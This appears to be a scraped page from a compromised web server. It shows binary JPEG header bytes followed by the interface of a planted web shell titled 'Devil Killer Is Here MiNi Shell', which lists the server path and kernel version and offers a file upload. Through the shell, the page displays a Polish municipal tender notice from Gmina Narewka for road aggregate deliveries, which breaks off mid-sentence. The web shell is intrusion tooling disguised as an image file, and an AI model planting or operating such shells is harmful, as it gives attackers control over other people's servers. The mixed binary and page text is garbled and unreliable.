JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220329/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220329/0010190101-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Przebudowa dróg rolniczych na terenie Gminy Narewka - zakup wraz z dostawą mieszanek kruszywa niezwiązanego C50/30 o uziarnieniu ciągłym 0/31,5 przeznaczonego do celów drogowych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Narewka</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 050659562</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Białowieska 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Narewka</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">17-220</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL842 - Łomżyński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@ug.narewka.wrotapodlasia.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://platformazakupowa.pl/pn/narewka</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa dróg rolniczych na terenie Gminy Narewka - zakup wraz z dostawą mieszanek kruszywa niezwiązanego C50/30 o uziarnieniu ciągłym 0/31,5 przeznaczonego do celów drogowych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-11497bd6-af47-11ec-baa2-b6d934483bfb</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00101901</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-03-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00001040/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Przebudowa dróg rolniczych na terenie Gminy Narewka - Zakup wraz z dostawą mieszanek kruszywa niezwiązanego C50/30 o uziarnieniu ciągłym 0/31,5 przeznaczonego do celów drogowych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/narewka <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja w postępowaniu o<br/>udzielenie zamówienia odbywa się przy użyciu środków komunikacji elektronicznej, za pośrednictwem<br/>platformy zakupowej pod adresem https://platformazakupowa.pl/pn/narewka zwanej dalej Platformą.<br/>Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej<br/>wymienionej w Dziale I Rozdział 1 SWZ. Szczegółowe informacje dotyczące przyjętego w<br/>postępowaniu sposobu komunikacji, znajdują się w Dziale III Rozdział 1 SWZ</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający określa niezbędne<br/>wymagania sprzętowo - aplikacyjne, umożliwiające pracę<br/>na Platformie, tj.:<br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>2) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2<br/>GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux,<br/>lub ich nowsze wersje,<br/>3) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja<br/>10.0,<br/>4) włączona obsługa JavaScript,<br/>5) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>6) szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3.<br/>7) oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas<br/>(hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego<br/>Urzędu Miar.<br/>2. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>1) akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie zamieszczonym na<br/>stronie internetowej pod linkiem w zakładce „Regulamin&#34; oraz uznaje go za wiążący,<br/>2) zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej pod linkiem.<br/>3. Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z Instrukcją<br/>korzystania z platformazakupowa.pl, w szczególności za sytuację, gdy zamawiający zapozna się z treścią oferty przed upływem<br/>terminu składania ofert (np. złożenie oferty w zakładce „Wyślij wiadomość<br/>do zamawiającego”). Taka oferta zostanie uznana przez Zamawiającego za ofertę handlową i nie<br/>będzie brana pod uwagę w przedmiotowym postępowaniu, ponieważ nie został spełniony obowiązek<br/>narzucony w art. 221 Ustawy Prawo Zamówień Publicznych.<br/>4. Zamawiający informuje, że instrukcje korzystania z platformazakupowa.pl dotyczące w<br/>szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych<br/>czynności podejmowanych w niniejszym postępowaniu przy użyciu platformazakupowa.pl znajdują się<br/>w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem:<br/>https://platformazakupowa.pl/strona/45-instrukcje<br/>Formaty plików wykorzystywanych przez wykonawców powinny być zgodne z “Obwieszczeniem<br/>Prezesa Rady Ministrów z dnia 9 listopada 2017 r. w sprawie ogłoszenia jednolitego tekstu<br/>rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań<br/>dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla<br/>systemów teleinformatycznych”.<br/>5. Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .xls .jpg (.jpeg) ze szczególnym<br/>wskazaniem na .pdf<br/>6. W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z<br/>formatów: .zip .7Z<br/>7. Wśród formatów powszechnych a NIE występujących w rozporządzeniu występują: .rar .gif .bmp<br/>.numbers .pages<br/>Ze względu na ograniczoną ilość znaków, pozostałe wymagania techniczne i organizacyjne znajdują<br/>się w w Dziale III Rozdział 1 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016), dalej „RODO”, informujemy, że:<br/>1. administratorem Pani/Pana danych osobowych jest Wójt Gminy Narewka z siedzibą w Narewce, ul.<br/>Białowieska 1, 17-220 Narewka;<br/>2. można się skontaktować z inspektorem ochrony danych osobowych w Urzędzie Gminy Narewka<br/>osobiście, poprzez korespondencję tradycyjną i elektroniczną lub telefonicznie pod nr (85) 682 98 80; w<br/>celu uzyskania informacji dotyczących przetwarzanych przez Gminę Narewka danych osobowych<br/>może się Pan/Pani skontaktować z naszym Inspektorem Ochrony Danych poprzez wysłanie<br/>wiadomości elektronicznej na adres: iod_ug_narewka@podlaskie.pl<br/>3. dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z<br/>przedmiotowym postępowaniem o udzielenie zamówienia publicznego –prowadzonym w trybie<br/>podstawowym z możliwością negocjacji, zawarciem, realizacją oraz egzekucją umowy;<br/>4. odbiorcami danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o ustawę z dnia z 11 września 2019 r. – Prawo zamówień<br/>publicznych (Dz.U. z 2019 r. poz. 2019 ze zm.);<br/>5. wszelkie dane powierzone przez wykonawcę będą przechowywane przez okres wynikający z<br/>zapisów Rozporządzenia Prezesa Rady Ministrów z dnia 18 stycznia 2011 r. w sprawie instrukcji<br/>kancelaryjnej, jednolitych rzeczowych wykazów akt oraz instrukcji w sprawie organizacji i zakresu<br/>działania archiwów zakładowych (Dz. U. z 2011 r., Nr 14, poz. 67 ze zm.),<br/>6. obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy Pzp;<br/>7. w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO;<br/>8. posiada Pani/Pan:<br/>1) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>2) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>3) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>4) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan,<br/>że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9. nie przysługuje Pani/Panu:<br/>1) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>2) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>3) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>Ze względu na ograniczoną ilość znaków, pozostałe informacje dotyczące RODO znajdują<br/>się w w Dziale I Rozdział 17 SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.1.6.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem niniejszego zamówienia jest „Przebudowa dróg rolniczych na terenie Gminy Narewka - zakup wraz z<br/>dostawą mieszanek kruszywa niezwiązanego C50/30 o uziarnieniu ciągłym 0/31,5 przeznaczonego do celów drogowych”.<br/>2. Zakres zamówienia obejmuje:<br/>1) Sukcesywna dostawa mieszanek kruszywa niezwiązanego C50/30 o uziarnieniu ciągłym 0/31,5 w ilości do 11 000 ton w<br/>miejsce wskazane przez zamawiającego na terenie całej Gminy Narewka, przy czym minimalna łączna wielkość<br/>świadczenia wynosi 2 000 ton.<br/>3. Dostarczona mieszanka musi spełnić wymagania zawarte w:<br/>1) PN-EN 933-1 „Badania geometrycznych właściwości kruszyw – Oznaczanie składu ziarnowego – Metoda przesiewania”;<br/>2) PN-EN 13242 „Kruszywa do niezwiązanych i związanych hydraulicznie materiałów stosowanych w obiektach<br/>budowlanych i budownictwie drogowym”.<br/>4. Wraz z dostarczoną mieszanką Wykonawca przedkłada Zamawiającemu deklarację pochodzenia mieszanki (złoże<br/>koncesjonowane) oraz aktualne badania potwierdzające spełnieni warunków zamówienia. Badania cech geometrycznych<br/>mieszanek nie mogą być starsze niż 2 miesiące od dnia dostarczenia danej partii.<br/>5. Mieszanka będzie dostarczane samochodami samowyładowczymi Wykonawcy w ilości i miejscu wskazanym przez<br/>Zamawiającego (na terenie Gminy Narewka).<br/>6. Mieszanka nie może zawierać gliny, gwoździ, metalowych drutów ani innych zanieczyszczeń mogących uszkodzić<br/>pojazdy poruszające się po drogach, a także innych trudno rozkładalnych zanieczyszczeń (plastik, guma, itp.). W przypadku<br/>ujawnienia w zawartości kruszywa takich zanieczyszczeń zamawiający żądać będzie usunięcia tych zanieczyszczeń - na<br/>koszt Wykonawcy.<br/>7. Przy wycenie dostawy w celu określenia ceny ofertowej, wykonawca będzie uwzględniał wszystkie koszty związane z<br/>zakupem, transportem, rozładunkiem i ważeniem.<br/>8. Wykonawca przyjmuje na siebie pełna odpowiedzialność za właściwe wykonanie dostaw, zapewnienie jakości materiałów<br/>oraz metod organizacyjno-technicznych w trakcie realizacji zamówienia.<br/>9. Wykonawca zapewnieni bezpieczeństwo i ochronę zdrowia podczas wykonywania wszystkich czynności w czasie<br/>realizacji dostaw oraz będzie utrzymywał miejsce prowadzonych dostaw w stanie bezpiecznym dla osób postronnych.<br/>10. Strony uzgadniają, że dostawy realizowane będą sukcesywnie, w oparciu o zapotrzebowanie Zamawiającego, przesłane<br/>Wykonawcy w sposób określony w § 4 ust. 4 wzoru umowy, określające:<br/>1) ilość mieszanki,<br/>2) miejsce dostawy, rozładunku, rozplanowanie (dostawa na określone drogi i/lub zwałki na terenie Gminy Narewka),<br/>3) sposób rozładunku: punktowo (we wskazanym miejscu na hałdę) i/lub ciągle (z rozciągnięciem na całej długości<br/>wskazanego odcinka),<br/>4) osobę upoważnioną do odbioru i podpisania dokumentu WZ.<br/>11. Wykonawca zobowiązuje się zapewnić dostawę, transport, rozładunek mieszanki w miejscach wskazanych przez<br/>Zamawiającego na terenie Gminy Narewka.<br/>12. Dostawa przedmiotu zamówienia w ramach zamówienia rozpocznie się w terminie do 2 dni kalendarzowych od dnia<br/>otrzymania pisemnego (lub przekazanego pocztą elektroniczną) zapotrzebowania od Zamawiającego.<br/>13. Zamawiający ma prawo do zbadania dostarczanego kruszywa pod względem ilości i jakości. Zamawiający dokona<br/>odbioru jakościowego i ilościowego dostarczonego przedmiotu umowy w trakcie bieżących dostaw. Dostarczenie<br/>przedmiotu umowy zostanie potwierdzone przez strony dokumentem - wydanie zewnętrzne (WZ).<br/>14. W przypadku stwierdzenia niezgodności wagi z dokumentem WZ Zamawiający zapłaci tylko za rzeczywistą ilość<br/>dostarczonego kruszywa. Każdy przypadek niezgodności wagi na dokumencie WZ i wagi rzeczywistej stanowić będzie<br/>podstawę do naliczenia Wykonawcy kary umownej w wysokości 1000 zł o której mowa w § 7 ust. 2 pkt. 2).<br/>15. Jeżeli Zamawiający stwierdzi odstępstwa dostarczonego kruszywa od opisu przedmiotu zamówienia polegające na:<br/>1) obecności zanieczyszczeń obcych, w szczególności: azbest, popioły, metale, szkło;<br/>2) obecności w kruszywie kruszyw sztucznych i/lub pochodzących z recyklingu,<br/>3) obecności w kruszywie domieszek z gliny i/lub piasku,<br/>- odmówi przyjęcia towaru.<br/>16. Zamawiający każdorazowo może dokonać badania jakości dostarczonego kruszywa przez niezależne laboratorium/firmę<br/>zewnętrzną.<br/>17. Próbki kruszywa będą pobierane przy rozładunku przez pracownika Zamawiającego w obecności pracownika<br/>Wykonawcy. Pobrane próbki będą dostarczone niezwłocznie do laboratorium/firmy zewnętrznej.<br/>18. Przedstawiciel Wykonawcy ma prawo uczestniczyć przy procedurze transportu i przekazania do badania próbki<br/>kruszywa do laboratorium/firmy zewnętrznej.<br/>19. W przypadku otrzymania wyników z badań o których mowa w ust. 15 niezgodnych z normami o których mowa w ust. 3,<br/>Zamawiający będzie żądał uzupełnienia brakującej frakcji lub dowiezienia mieszaki kruszyw o odpowiednich parametrach.<br/>Kruszywo dowiezione przez Wykonawcę które nie spełnia wymogów na wniosek Zamawiającego winno zostać zebrane i<br/>wywiezione z drogi. Ponadto stwierdzenie w sprawozdaniu z badań, iż próbka kruszywa jest niezgodna w stosunku do<br/>wymagań Zamawiającego określonych w opisie przedmiotu zamówienia stanowić będzie każdorazowo podstawę do<br/>naliczenia Wykonawcy kary umownej w wysokości 5000 zł o której mowa w §7 ust. 2 pkt. 3), a także Zamawiający na prawo<br/>obciążyć Wykonawcę wszelkimi kosztami dokonanego badania<br/>20. W przypadku wykonywania przedmiotu umowy przy udziale podwykonawców Wykonawca odpowiada za działania<br/>podwykonawców wobec Zamawiającego jak za swoje własne.<br/>21. Wykonawca zobowiązany jest zrealizować zamówienie na zasadach i warunkach opisanych w niniejszej SWZ oraz<br/>istotnych postanowieniach umowy stanowiących Załącznik nr 3 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">14212200-2 - Kruszywo</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">60000000-8 - Usługi transportowe (z wyłączeniem transportu odpadów)</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">8 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku:<br/>1) Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do<br/>reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia<br/>umowy w sprawie przedmiotowego zamówienia publicznego.<br/>2) Wszelka korespondencja będzie prowadzona przez zamawiającego wyłącznie z pełnomocnikiem.<br/>2. Potencjał podmiotu trzeciego.<br/>1) W celu potwierdzenia spełnienia warunków udziału w postępowaniu, wykonawca może<br/>polegać na potencjale podmiotu trzeciego na zasadach opisanych w art. 118–123 ustawy Pzp.<br/>Podmiot trzeci, na potencjał którego wykonawca powołuje się w celu wykazania spełnienia<br/>warunków udziału w postępowaniu, nie może podlegać wykluczeniu na podstawie przesłanek<br/>opisanych w Dziale II rozdział 8 SWZ.<br/>2) Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby<br/>Wykonawca powoływał się, na zasadach określonych w art. 118 ust. 1 ustawy Pzp, w celu<br/>wykazania spełniania warunków udziału w postępowaniu, o których mowa w SWZ, Wykonawca<br/>jest obowiązany wykazać Zamawiającemu, że proponowany inny podwykonawca lub<br/>Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż podwykonawca, na którego<br/>zasoby Wykonawca powoływał się w trakcie postępowania o udzielenie zamówienia. Przepis art.<br/>122 stosuje się 